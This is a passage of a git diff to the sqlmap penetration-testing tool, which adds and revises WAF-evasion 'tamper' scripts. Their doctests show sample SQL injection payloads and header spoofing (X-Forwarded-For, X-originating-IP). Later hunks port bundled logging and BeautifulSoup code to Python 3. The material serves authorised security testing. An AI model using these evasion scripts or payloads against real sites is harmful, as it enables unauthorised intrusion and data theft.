a valid set of alternate characters Requirement: * MySQL @@ -34,6 +30,10 @@ def tamper(payload, **kwargs): Notes: * Useful to bypass several web application firewalls + + >>> random.seed(0) + >>> tamper('SELECT id FROM users') + 'SELECT%A0id%0CFROM%0Dusers' """ # ASCII table: @@ -42,7 +42,7 @@ def tamper(payload, **kwargs): # FF 0C new page # CR 0D carriage return # VT 0B vertical TAB (MySQL and Microsoft SQL Server only) - # - A0 - (MySQL only) + # A0 non-breaking space blanks = ('%09', '%0A', '%0C', '%0D', '%0B', '%A0') retVal = payload diff --git a/tamper/space2mysqldash.py b/tamper/space2mysqldash.py index e7a4d4d5336..e5fb85aafab 100644 --- a/tamper/space2mysqldash.py +++ b/tamper/space2mysqldash.py @@ -1,13 +1,14 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying 
permission """ import os from lib.core.common import singleTimeWarnMessage +from lib.core.compat import xrange from lib.core.enums import DBMS from lib.core.enums import PRIORITY @@ -18,21 +19,17 @@ def dependencies(): def tamper(payload, **kwargs): """ - Replaces space character (' ') with a dash comment ('--') followed by - a new line ('\n') - - Example: - * Input: 1 AND 9227=9227 - * Output: 1--%0AAND--%0A9227=9227 + Replaces space character (' ') with a dash comment ('--') followed by a new line ('\n') Requirement: * MySQL * MSSQL - Tested against: - Notes: * Useful to bypass several web application firewalls. + + >>> tamper('1 AND 9227=9227') + '1--%0AAND--%0A9227=9227' """ retVal = "" diff --git a/tamper/space2plus.py b/tamper/space2plus.py index ede26ba0982..a6ec73fc093 100644 --- a/tamper/space2plus.py +++ b/tamper/space2plus.py @@ -1,10 +1,11 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ +from lib.core.compat import xrange from lib.core.enums import PRIORITY __priority__ = PRIORITY.LOW @@ -16,14 +17,12 @@ def tamper(payload, **kwargs): """ Replaces space character (' ') with plus ('+') - Example: - * Input: SELECT id FROM users - * Output: SELECT+id+FROM+users - Notes: - * Is this any useful? The plus get's url-encoded by sqlmap engine - invalidating the query afterwards + * Is this any useful? The plus get's url-encoded by sqlmap engine invalidating the query afterwards * This tamper script works against all databases + + >>> tamper('SELECT id FROM users') + 'SELECT+id+FROM+users' """ retVal = payload diff --git a/tamper/space2randomblank.py b/tamper/space2randomblank.py index 4114cf2a137..cbf162ffcd9 100644 --- a/tamper/space2randomblank.py +++ b/tamper/space2randomblank.py @@ -1,12 +1,13 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ import random +from lib.core.compat import xrange from lib.core.enums import PRIORITY __priority__ = PRIORITY.LOW @@ -16,12 +17,7 @@ def dependencies(): def tamper(payload, **kwargs): """ - Replaces space character (' ') with a random blank character from a - valid set of alternate characters - - Example: - * Input: SELECT id FROM users - * Output: SELECT\rid\tFROM\nusers + Replaces space character (' ') with a random blank character from a valid set of alternate characters Tested against: * Microsoft SQL Server 2005 @@ -31,6 +27,10 @@ def tamper(payload, **kwargs): Notes: * Useful to bypass several web application firewalls + + >>> random.seed(0) + >>> tamper('SELECT id FROM users') + 'SELECT%0Did%0CFROM%0Ausers' """ # ASCII table: diff --git a/tamper/substring2leftright.py b/tamper/substring2leftright.py new file mode 100644 index 00000000000..9df851a584f --- /dev/null +++ b/tamper/substring2leftright.py @@ -0,0 +1,47 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +import re + +from lib.core.enums import PRIORITY + +__priority__ = PRIORITY.NORMAL + +def dependencies(): + pass + +def tamper(payload, **kwargs): + """ + Replaces PostgreSQL SUBSTRING with LEFT and RIGHT + + Tested against: + * PostgreSQL 9.6.12 + + Note: + * Useful 
to bypass weak web application firewalls that filter SUBSTRING (but not LEFT and RIGHT) + + >>> tamper('SUBSTRING((SELECT usename FROM pg_user)::text FROM 1 FOR 1)') + 'LEFT((SELECT usename FROM pg_user)::text,1)' + >>> tamper('SUBSTRING((SELECT usename FROM pg_user)::text FROM 3 FOR 1)') + 'LEFT(RIGHT((SELECT usename FROM pg_user)::text,-2),1)' + """ + + retVal = payload + + if payload: + match = re.search(r"SUBSTRING\((.+?)\s+FROM[^)]+(\d+)[^)]+FOR[^)]+1\)", payload) + + if match: + pos = int(match.group(2)) + if pos == 1: + _ = "LEFT(%s,1)" % (match.group(1)) + else: + _ = "LEFT(RIGHT(%s,%d),1)" % (match.group(1), 1 - pos) + + retVal = retVal.replace(match.group(0), _) + + return retVal diff --git a/tamper/symboliclogical.py b/tamper/symboliclogical.py new file mode 100644 index 00000000000..c7588aeb02a --- /dev/null +++ b/tamper/symboliclogical.py @@ -0,0 +1,30 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +import re + +from lib.core.enums import PRIORITY + +__priority__ = PRIORITY.LOWEST + +def dependencies(): + pass + +def tamper(payload, **kwargs): + """ + Replaces AND and OR logical operators with their symbolic counterparts (&& and ||) + + >>> tamper("1 AND '1'='1") + "1 %26%26 '1'='1" + """ + + retVal = payload + + if payload: + retVal = re.sub(r"(?i)\bAND\b", "%26%26", re.sub(r"(?i)\bOR\b", "%7C%7C", payload)) + + return retVal diff --git a/tamper/unionalltounion.py b/tamper/unionalltounion.py index 8421176dec4..16e4ab7d477 100644 --- a/tamper/unionalltounion.py +++ b/tamper/unionalltounion.py @@ -1,8 +1,8 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ from lib.core.enums import PRIORITY @@ -14,11 +14,10 @@ def dependencies(): def tamper(payload, **kwargs): """ - Replaces UNION ALL SELECT with UNION SELECT + Replaces instances of UNION ALL SELECT with UNION SELECT counterpart - Example: - * Input: -1 UNION ALL SELECT - * Output: -1 UNION SELECT + >>> tamper('-1 UNION ALL SELECT') + '-1 UNION SELECT' """ return payload.replace("UNION ALL SELECT", "UNION SELECT") if payload else payload diff --git a/tamper/unmagicquotes.py b/tamper/unmagicquotes.py index 9170e664268..5ccde715b9d 100644 --- a/tamper/unmagicquotes.py +++ b/tamper/unmagicquotes.py @@ -1,12 +1,13 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ import re +from lib.core.compat import xrange from lib.core.enums import PRIORITY __priority__ = PRIORITY.NORMAL @@ -16,18 +17,16 @@ def dependencies(): def tamper(payload, **kwargs): """ - Replaces quote character (') with a multi-byte combo %bf%27 together with - generic comment at the end (to make it work) - - Example: - * Input: 1' AND 1=1 - * Output: 1%bf%27 AND 1=1--%20 + Replaces quote character (') with a multi-byte combo %BF%27 together with generic comment at the end (to make it work) Notes: * Useful for bypassing magic_quotes/addslashes feature Reference: * http://shiflett.org/blog/2006/jan/addslashes-versus-mysql-real-escape-string + + >>> tamper("1' AND 1=1") + '1%bf%27-- -' """ retVal = payload @@ -45,7 +44,10 @@ def tamper(payload, **kwargs): 
continue if found: - retVal = re.sub("\s*(AND|OR)[\s(]+'[^']+'\s*(=|LIKE)\s*'.*", "", retVal) - retVal += "-- " - + _ = re.sub(r"(?i)\s*(AND|OR)[\s(]+([^\s]+)\s*(=|LIKE)\s*\2", "", retVal) + if _ != retVal: + retVal = _ + retVal += "-- -" + elif not any(_ in retVal for _ in ('#', '--', '/*')): + retVal += "-- -" return retVal diff --git a/tamper/uppercase.py b/tamper/uppercase.py new file mode 100644 index 00000000000..81774a99968 --- /dev/null +++ b/tamper/uppercase.py @@ -0,0 +1,46 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +import re + +from lib.core.data import kb +from lib.core.enums import PRIORITY + +__priority__ = PRIORITY.NORMAL + +def dependencies(): + pass + +def tamper(payload, **kwargs): + """ + Replaces each keyword character with upper case value (e.g. select -> SELECT) + + Tested against: + * Microsoft SQL Server 2005 + * MySQL 4, 5.0 and 5.5 + * Oracle 10g + * PostgreSQL 8.3, 8.4, 9.0 + + Notes: + * Useful to bypass very weak and bespoke web application firewalls + that has poorly written permissive regular expressions + * This tamper script should work against all (?) databases + + >>> tamper('insert') + 'INSERT' + """ + + retVal = payload + + if payload: + for match in re.finditer(r"[A-Za-z_]+", retVal): + word = match.group() + + if word.upper() in kb.keywords: + retVal = retVal.replace(word, word.upper()) + + return retVal diff --git a/tamper/varnish.py b/tamper/varnish.py new file mode 100644 index 00000000000..92fb98cb3fd --- /dev/null +++ b/tamper/varnish.py @@ -0,0 +1,33 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +from lib.core.enums import PRIORITY + +__priority__ = PRIORITY.NORMAL + +def dependencies(): + pass + +def tamper(payload, **kwargs): + """ + Appends a HTTP header 'X-originating-IP' to bypass Varnish Firewall + + Reference: + * https://web.archive.org/web/20160815052159/http://community.hpe.com/t5/Protect-Your-Assets/Bypassing-web-application-firewalls-using-HTTP-headers/ba-p/6418366 + + Notes: + Examples: + >> X-forwarded-for: TARGET_CACHESERVER_IP (184.189.250.X) + >> X-remote-IP: TARGET_PROXY_IP (184.189.250.X) + >> X-originating-IP: TARGET_LOCAL_IP (127.0.0.1) + >> x-remote-addr: TARGET_INTERNALUSER_IP (192.168.1.X) + >> X-remote-IP: * or %00 or %0A + """ + + headers = kwargs.get("headers", {}) + headers["X-originating-IP"] = "127.0.0.1" + return payload diff --git a/tamper/versionedkeywords.py b/tamper/versionedkeywords.py index b2d392fd357..7ab70933198 100644 --- a/tamper/versionedkeywords.py +++ b/tamper/versionedkeywords.py @@ -1,8 +1,8 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ import os @@ -20,11 +20,7 @@ def dependencies(): def tamper(payload, **kwargs): """ - Encloses each non-function keyword with versioned MySQL comment - - Example: - * Input: 1 UNION ALL SELECT NULL, NULL, CONCAT(CHAR(58,104,116,116,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,100,114,117,58))# - * Output: 1/*!UNION*//*!ALL*//*!SELECT*//*!NULL*/,/*!NULL*/, CONCAT(CHAR(58,104,116,116,58),IFNULL(CAST(CURRENT_USER()/*!AS*//*!CHAR*/),CHAR(32)),CHAR(58,100,114,117,58))# + Encloses each non-function keyword with (MySQL) versioned comment 
Requirement: * MySQL @@ -35,6 +31,9 @@ def tamper(payload, **kwargs): Notes: * Useful to bypass several web application firewalls when the back-end database management system is MySQL + + >>> tamper('1 UNION ALL SELECT NULL, NULL, CONCAT(CHAR(58,104,116,116,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,100,114,117,58))#') + '1/*!UNION*//*!ALL*//*!SELECT*//*!NULL*/,/*!NULL*/, CONCAT(CHAR(58,104,116,116,58),IFNULL(CAST(CURRENT_USER()/*!AS*//*!CHAR*/),CHAR(32)),CHAR(58,100,114,117,58))#' """ def process(match): @@ -47,7 +46,7 @@ def process(match): retVal = payload if payload: - retVal = re.sub(r"(?<=\W)(?P<word>[A-Za-z_]+)(?=[^\w(]|\Z)", lambda match: process(match), retVal) + retVal = re.sub(r"(?<=\W)(?P<word>[A-Za-z_]+)(?=[^\w(]|\Z)", process, retVal) retVal = retVal.replace(" /*!", "/*!").replace("*/ ", "*/") return retVal diff --git a/tamper/versionedmorekeywords.py b/tamper/versionedmorekeywords.py index 6cad83a77e8..aea7d50e598 100644 --- a/tamper/versionedmorekeywords.py +++ b/tamper/versionedmorekeywords.py @@ -1,8 +1,8 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ import os @@ -21,11 +21,7 @@ def dependencies(): def tamper(payload, **kwargs): """ - Encloses each keyword with versioned MySQL comment - - Example: - * Input: 1 UNION ALL SELECT NULL, NULL, CONCAT(CHAR(58,122,114,115,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,115,114,121,58))# - * Output: 1/*!UNION*//*!ALL*//*!SELECT*//*!NULL*/,/*!NULL*/,/*!CONCAT*/(/*!CHAR*/(58,122,114,115,58),/*!IFNULL*/(CAST(/*!CURRENT_USER*/()/*!AS*//*!CHAR*/),/*!CHAR*/(32)),/*!CHAR*/(58,115,114,121,58))# + Encloses each keyword with (MySQL) versioned comment Requirement: * MySQL >= 5.1.13 @@ -36,6 +32,9 @@ def tamper(payload, **kwargs): Notes: * Useful to bypass several web application firewalls when the back-end database management system is MySQL + + >>> tamper('1 UNION ALL SELECT NULL, NULL, CONCAT(CHAR(58,122,114,115,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,115,114,121,58))#') + '1/*!UNION*//*!ALL*//*!SELECT*//*!NULL*/,/*!NULL*/,/*!CONCAT*/(/*!CHAR*/(58,122,114,115,58),/*!IFNULL*/(CAST(/*!CURRENT_USER*/()/*!AS*//*!CHAR*/),/*!CHAR*/(32)),/*!CHAR*/(58,115,114,121,58))#' """ def process(match): @@ -48,7 +47,7 @@ def process(match): retVal = payload if payload: - retVal = re.sub(r"(?<=\W)(?P<word>[A-Za-z_]+)(?=\W|\Z)", lambda match: process(match), retVal) + retVal = re.sub(r"(?<=\W)(?P<word>[A-Za-z_]+)(?=\W|\Z)", process, retVal) retVal = retVal.replace(" /*!", "/*!").replace("*/ ", "*/") return retVal diff --git a/tamper/xforwardedfor.py b/tamper/xforwardedfor.py new file mode 100644 index 00000000000..110bbbfd6f1 --- /dev/null +++ b/tamper/xforwardedfor.py @@ -0,0 +1,44 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +import random + +from lib.core.compat import xrange +from lib.core.enums import PRIORITY + +__priority__ = PRIORITY.NORMAL + +def dependencies(): + pass + +def randomIP(): + octets = [] + + while not octets or octets[0] in (10, 172, 192): + octets = random.sample(xrange(1, 255), 4) + + return '.'.join(str(_) for _ in octets) + +def tamper(payload, **kwargs): + """ + Append a fake HTTP header 'X-Forwarded-For' (and alike) + """ + + headers = kwargs.get("headers", {}) + 
headers["X-Forwarded-For"] = randomIP() + headers["X-Client-Ip"] = randomIP() + headers["X-Real-Ip"] = randomIP() + headers["CF-Connecting-IP"] = randomIP() + headers["True-Client-IP"] = randomIP() + + # Reference: https://developer.chrome.com/multidevice/data-compression-for-isps#proxy-connection + headers["Via"] = "1.1 Chrome-Compression-Proxy" + + # Reference: https://wordpress.org/support/topic/blocked-country-gaining-access-via-cloudflare/#post-9812007 + headers["CF-IPCountry"] = random.sample(('GB', 'US', 'FR', 'AU', 'CA', 'NZ', 'BE', 'DK', 'FI', 'IE', 'AT', 'IT', 'LU', 'NL', 'NO', 'PT', 'SE', 'ES', 'CH'), 1)[0] + + return payload diff --git a/thirdparty/ansistrm/ansistrm.py b/thirdparty/ansistrm/ansistrm.py index c4db309af76..4d9731c1b68 100644 --- a/thirdparty/ansistrm/ansistrm.py +++ b/thirdparty/ansistrm/ansistrm.py @@ -1,12 +1,26 @@ # # Copyright (C) 2010-2012 Vinay Sajip. All rights reserved. Licensed under the new BSD license. +# (Note: 2018 modifications by @stamparm) # -import ctypes + import logging -import os import re +import sys + +from lib.core.settings import IS_WIN + +if IS_WIN: + import ctypes + import ctypes.wintypes -from lib.core.convert import stdoutencode + # Reference: https://gist.github.com/vsajip/758430 + # https://github.com/ipython/ipython/issues/4252 + # https://msdn.microsoft.com/en-us/library/windows/desktop/ms686047%28v=vs.85%29.aspx + ctypes.windll.kernel32.SetConsoleTextAttribute.argtypes = [ctypes.wintypes.HANDLE, ctypes.wintypes.WORD] + ctypes.windll.kernel32.SetConsoleTextAttribute.restype = ctypes.wintypes.BOOL + +def stdoutEncode(data): # Cross-referenced function + return data class ColorizingStreamHandler(logging.StreamHandler): # color names to indices @@ -22,24 +36,16 @@ class ColorizingStreamHandler(logging.StreamHandler): } # levels to (background, foreground, bold/intense) - if os.name == 'nt': - level_map = { - logging.DEBUG: (None, 'blue', False), - logging.INFO: (None, 'green', False), - logging.WARNING: (None, 'yellow', False), - logging.ERROR: (None, 'red', False), - logging.CRITICAL: ('red', 'white', False) - } - else: - level_map = { - logging.DEBUG: (None, 'blue', False), - logging.INFO: (None, 'green', False), - logging.WARNING: (None, 'yellow', False), - logging.ERROR: (None, 'red', False), - logging.CRITICAL: ('red', 'white', False) - } + level_map = { + logging.DEBUG: (None, 'blue', False), + logging.INFO: (None, 'green', False), + logging.WARNING: (None, 'yellow', False), + logging.ERROR: (None, 'red', False), + logging.CRITICAL: ('red', 'white', False) + } csi = '\x1b[' reset = '\x1b[0m' + bold = "\x1b[1m" disable_coloring = False @property @@ -49,7 +55,7 @@ def is_tty(self): def emit(self, record): try: - message = stdoutencode(self.format(record)) + message = stdoutEncode(self.format(record)) stream = self.stream if not self.is_tty: @@ -63,10 +69,12 @@ def emit(self, record): self.flush() except (KeyboardInterrupt, SystemExit): raise + except IOError: + pass except: self.handleError(record) - if os.name != 'nt': + if not IS_WIN: def output_colorized(self, message): self.stream.write(message) else: @@ -85,7 +93,6 @@ def output_colorized(self, message): def output_colorized(self, message): parts = self.ansi_esc.split(message) - write = self.stream.write h = None fd = getattr(self.stream, 'fileno', None) @@ -99,7 +106,8 @@ def output_colorized(self, message): text = parts.pop(0) if text: - write(text) + self.stream.write(text) + self.stream.flush() if parts: params = parts.pop(0) @@ -122,9 +130,19 @@ def 
output_colorized(self, message): ctypes.windll.kernel32.SetConsoleTextAttribute(h, color) - def colorize(self, message, record): - if record.levelno in self.level_map and self.is_tty: - bg, fg, bold = self.level_map[record.levelno] + def _reset(self, message): + if not message.endswith(self.reset): + reset = self.reset + elif self.bold in message: # bold + reset = self.reset + self.bold + else: + reset = self.reset + + return reset + + def colorize(self, message, levelno): + if levelno in self.level_map and self.is_tty: + bg, fg, bold = self.level_map[levelno] params = [] if bg in self.color_map: @@ -150,4 +168,4 @@ def colorize(self, message, record): def format(self, record): message = logging.StreamHandler.format(self, record) - return self.colorize(message, record) + return self.colorize(message, record.levelno) diff --git a/thirdparty/beautifulsoup/__init__.py b/thirdparty/beautifulsoup/__init__.py index 7954a3d0a47..a905a4ce403 100644 --- a/thirdparty/beautifulsoup/__init__.py +++ b/thirdparty/beautifulsoup/__init__.py @@ -1,4 +1,4 @@ -#!/usr/bin/env python +#!/usr/bin/env python2 # # Copyright (c) 2004-2010, Leonard Richardson # @@ -16,7 +16,7 @@ # disclaimer in the documentation and/or other materials provided # with the distribution. # -# * Neither the name of the the Beautiful Soup Consortium and All +# * Neither the name of the Beautiful Soup Consortium and All # Night Kosher Bakery nor the names of its contributors may be # used to endorse or promote products derived from this software # without specific prior written permission. diff --git a/thirdparty/beautifulsoup/beautifulsoup.py b/thirdparty/beautifulsoup/beautifulsoup.py index cde92ee112c..849956bb0e2 100644 --- a/thirdparty/beautifulsoup/beautifulsoup.py +++ b/thirdparty/beautifulsoup/beautifulsoup.py @@ -58,7 +58,7 @@ disclaimer in the documentation and/or other materials provided with the distribution. - * Neither the name of the the Beautiful Soup Consortium and All + * Neither the name of the Beautiful Soup Consortium and All Night Kosher Bakery nor the names of its contributors may be used to endorse or promote products derived from this software without specific prior written permission. 
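The ansistrm.py hunks above keep a single level_map of log levels to colors and wrap messages in csi/reset escape sequences when the stream is an ANSI-capable terminal (falling back to SetConsoleTextAttribute on Windows). A minimal standalone sketch of the ANSI side of that approach, using illustrative names (AnsiColorHandler, COLORS) rather than sqlmap's actual classes:

import logging
import sys

CSI, RESET = '\x1b[', '\x1b[0m'
# Illustrative level -> ANSI foreground code map, in the spirit of level_map above
COLORS = {
    logging.DEBUG: 34,     # blue
    logging.INFO: 32,      # green
    logging.WARNING: 33,   # yellow
    logging.ERROR: 31,     # red
    logging.CRITICAL: 37,  # white
}

class AnsiColorHandler(logging.StreamHandler):
    def emit(self, record):
        try:
            message = self.format(record)
            # Only add escape codes when writing to a real terminal (same idea as is_tty)
            if getattr(self.stream, 'isatty', lambda: False)():
                code = COLORS.get(record.levelno)
                if code is not None:
                    message = '%s%dm%s%s' % (CSI, code, message, RESET)
            self.stream.write(message + '\n')
            self.flush()
        except Exception:
            self.handleError(record)

logger = logging.getLogger('ansidemo')
logger.addHandler(AnsiColorHandler(sys.stdout))
logger.warning('colorized only on ANSI-capable terminals')

Checking isatty() serves the same purpose as the is_tty property in the handler above: escape codes are emitted only when the output is an interactive terminal, so redirected logs stay clean.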
@@ -77,27 +77,47 @@ """ from __future__ import generators +from __future__ import print_function __author__ = "Leonard Richardson (leonardr@segfault.org)" -__version__ = "3.2.0" -__copyright__ = "Copyright (c) 2004-2010 Leonard Richardson" +__version__ = "3.2.1b" +__copyright__ = "Copyright (c) 2004-2012 Leonard Richardson" __license__ = "New-style BSD" -from sgmllib import SGMLParser, SGMLParseError import codecs -import markupbase -import types import re -import sgmllib +import sys + +if sys.version_info >= (3, 0): + xrange = range + text_type = str + binary_type = bytes + basestring = str + unichr = chr +else: + text_type = unicode + binary_type = str + try: - from htmlentitydefs import name2codepoint + from html.entities import name2codepoint except ImportError: - name2codepoint = {} + from htmlentitydefs import name2codepoint + try: set except NameError: from sets import Set as set +try: + import sgmllib +except ImportError: + from lib.utils import sgmllib + +try: + import markupbase +except ImportError: + import _markupbase as markupbase + #These hacks make Beautiful Soup able to parse XML with namespaces sgmllib.tagfind = re.compile('[a-zA-Z][-_.:a-zA-Z0-9]*') markupbase._declname_match = re.compile(r'[a-zA-Z][-_.:a-zA-Z0-9]*\s*').match @@ -106,7 +126,7 @@ def _match_css_class(str): """Build a RE to match the given CSS class.""" - return re.compile(r"(^|.*\s)%s($|\s)" % str) + return re.compile(r"(^|.*\s)%s($|\s)" % re.escape(str)) # First, the classes that represent markup elements. @@ -114,6 +134,21 @@ class PageElement(object): """Contains the navigational information for some part of the page (either a tag or a piece of text)""" + def _invert(h): + "Cheap function to invert a hash." + i = {} + for k,v in h.items(): + i[v] = k + return i + + XML_ENTITIES_TO_SPECIAL_CHARS = { "apos" : "'", + "quot" : '"', + "amp" : "&", + "lt" : "<", + "gt" : ">" } + + XML_SPECIAL_CHARS_TO_ENTITIES = _invert(XML_ENTITIES_TO_SPECIAL_CHARS) + def setup(self, parent=None, previous=None): """Sets up the initial relations between this element and other elements.""" @@ -355,7 +390,7 @@ def _findAll(self, name, attrs, text, limit, generator, **kwargs): g = generator() while True: try: - i = g.next() + i = next(g) except StopIteration: break if i: @@ -406,22 +441,24 @@ def substituteEncoding(self, str, encoding=None): def toEncoding(self, s, encoding=None): """Encodes an object to a string in some encoding, or to Unicode. .""" - if isinstance(s, unicode): - if encoding: - s = s.encode(encoding) - elif isinstance(s, str): + if isinstance(s, text_type): if encoding: s = s.encode(encoding) - else: - s = unicode(s) + elif isinstance(s, binary_type): + s = s.encode(encoding or "utf8") else: - if encoding: - s = self.toEncoding(str(s), encoding) - else: - s = unicode(s) + s = self.toEncoding(str(s), encoding or "utf8") return s -class NavigableString(unicode, PageElement): + BARE_AMPERSAND_OR_BRACKET = re.compile(r"([<>]|&(?!#\d+;|#x[0-9a-fA-F]+;|\w+;))") + + def _sub_entity(self, x): + """Used with a regular expression to substitute the + appropriate XML entity for an XML special character.""" + return "&" + self.XML_SPECIAL_CHARS_TO_ENTITIES[x.group(0)[0]] + ";" + + +class NavigableString(text_type, PageElement): def __new__(cls, value): """Create a new NavigableString. @@ -431,9 +468,9 @@ def __new__(cls, value): passed in to the superclass's __new__ or the superclass won't know how to handle non-ASCII characters. 
""" - if isinstance(value, unicode): - return unicode.__new__(cls, value) - return unicode.__new__(cls, value, DEFAULT_OUTPUT_ENCODING) + if isinstance(value, text_type): + return text_type.__new__(cls, value) + return text_type.__new__(cls, value, DEFAULT_OUTPUT_ENCODING) def __getnewargs__(self): return (NavigableString.__str__(self),) @@ -445,16 +482,18 @@ def __getattr__(self, attr): if attr == 'string': return self else: - raise AttributeError, "'%s' object has no attribute '%s'" % (self.__class__.__name__, attr) + raise AttributeError("'%s' object has no attribute '%s'" % (self.__class__.__name__, attr)) def __unicode__(self): return str(self).decode(DEFAULT_OUTPUT_ENCODING) def __str__(self, encoding=DEFAULT_OUTPUT_ENCODING): - if encoding: - return self.encode(encoding) + # Substitute outgoing XML entities. + data = self.BARE_AMPERSAND_OR_BRACKET.sub(self._sub_entity, self) + if encoding and sys.version_info < (3, 0): + return data.encode(encoding) else: - return self + return data class CData(NavigableString): @@ -480,45 +519,34 @@ class Tag(PageElement): """Represents a found HTML tag with its attributes and contents.""" - def _invert(h): - "Cheap function to invert a hash." - i = {} - for k,v in h.items(): - i[v] = k - return i - - XML_ENTITIES_TO_SPECIAL_CHARS = { "apos" : "'", - "quot" : '"', - "amp" : "&", - "lt" : "<", - "gt" : ">" } - - XML_SPECIAL_CHARS_TO_ENTITIES = _invert(XML_ENTITIES_TO_SPECIAL_CHARS) - def _convertEntities(self, match): """Used in a call to re.sub to replace HTML, XML, and numeric entities with the appropriate Unicode characters. If HTML entities are being converted, any unrecognized entities are escaped.""" - x = match.group(1) - if self.convertHTMLEntities and x in name2codepoint: - return unichr(name2codepoint[x]) - elif x in self.XML_ENTITIES_TO_SPECIAL_CHARS: - if self.convertXMLEntities: - return self.XML_ENTITIES_TO_SPECIAL_CHARS[x] - else: - return u'&%s;' % x - elif len(x) > 0 and x[0] == '#': - # Handle numeric entities - if len(x) > 1 and x[1] == 'x': - return unichr(int(x[2:], 16)) - else: - return unichr(int(x[1:])) + try: + x = match.group(1) + if self.convertHTMLEntities and x in name2codepoint: + return unichr(name2codepoint[x]) + elif x in self.XML_ENTITIES_TO_SPECIAL_CHARS: + if self.convertXMLEntities: + return self.XML_ENTITIES_TO_SPECIAL_CHARS[x] + else: + return u'&%s;' % x + elif len(x) > 0 and x[0] == '#': + # Handle numeric entities + if len(x) > 1 and x[1] == 'x': + return unichr(int(x[2:], 16)) + else: + return unichr(int(x[1:])) - elif self.escapeUnrecognizedEntities: - return u'&%s;' % x - else: - return u'&%s;' % x + elif self.escapeUnrecognizedEntities: + return u'&%s;' % x + + except ValueError: # e.g. ValueError: unichr() arg not in range(0x10000) + pass + + return u'&%s;' % x def __init__(self, parser, name, attrs=None, parent=None, previous=None): @@ -543,10 +571,11 @@ def __init__(self, parser, name, attrs=None, parent=None, self.escapeUnrecognizedEntities = parser.escapeUnrecognizedEntities # Convert any HTML, XML, or numeric entities in the attribute values. 
- convert = lambda(k, val): (k, - re.sub("&(#\d+|#x[0-9a-fA-F]+|\w+);", - self._convertEntities, - val)) + # Reference: https://github.com/pkrumins/xgoogle/pull/16/commits/3dba1165c436b0d6e5bdbd09e53ca0dbf8a043f8 + convert = lambda k_val: (k_val[0], + re.sub(r"&(#\d+|#x[0-9a-fA-F]+|\w+);", + self._convertEntities, + k_val[1])) self.attrs = map(convert, self.attrs) def getString(self): @@ -567,7 +596,7 @@ def getText(self, separator=u""): stopNode = self._lastRecursiveChild().next strings = [] current = self.contents[0] - while current is not stopNode: + while current and current is not stopNode: if isinstance(current, NavigableString): strings.append(current.strip()) current = current.next @@ -644,7 +673,7 @@ def __call__(self, *args, **kwargs): """Calling a tag like a function is the same as calling its findAll() method. Eg. tag('a') returns a list of all the A tags found within this tag.""" - return apply(self.findAll, args, kwargs) + return self.findAll(*args, **kwargs) def __getattr__(self, tag): #print "Getattr %s.%s" % (self.__class__, tag) @@ -652,7 +681,7 @@ def __getattr__(self, tag): return self.find(tag[:-3]) elif tag.find('__') != 0: return self.find(tag) - raise AttributeError, "'%s' object has no attribute '%s'" % (self.__class__, tag) + raise AttributeError("'%s' object has no attribute '%s'" % (self.__class__, tag)) def __eq__(self, other): """Returns true iff this tag has the same name, the same attributes, @@ -681,15 +710,6 @@ def __repr__(self, encoding=DEFAULT_OUTPUT_ENCODING): def __unicode__(self): return self.__str__(None) - BARE_AMPERSAND_OR_BRACKET = re.compile("([<>]|" - + "&(?!#\d+;|#x[0-9a-fA-F]+;|\w+;)" - + ")") - - def _sub_entity(self, x): - """Used with a regular expression to substitute the - appropriate XML entity for an XML special character.""" - return "&" + self.XML_SPECIAL_CHARS_TO_ENTITIES[x.group(0)[0]] + ";" - def __str__(self, encoding=DEFAULT_OUTPUT_ENCODING, prettyPrint=False, indentLevel=0): """Returns a string or Unicode representation of this tag and @@ -814,6 +834,7 @@ def renderContents(self, encoding=DEFAULT_OUTPUT_ENCODING, s.append(text) if prettyPrint: s.append("\n") + return ''.join(s) #Soup methods @@ -874,10 +895,10 @@ def childGenerator(self): def recursiveChildGenerator(self): if not len(self.contents): - raise StopIteration + return # Note: https://stackoverflow.com/a/30217723 (PEP 479) stopNode = 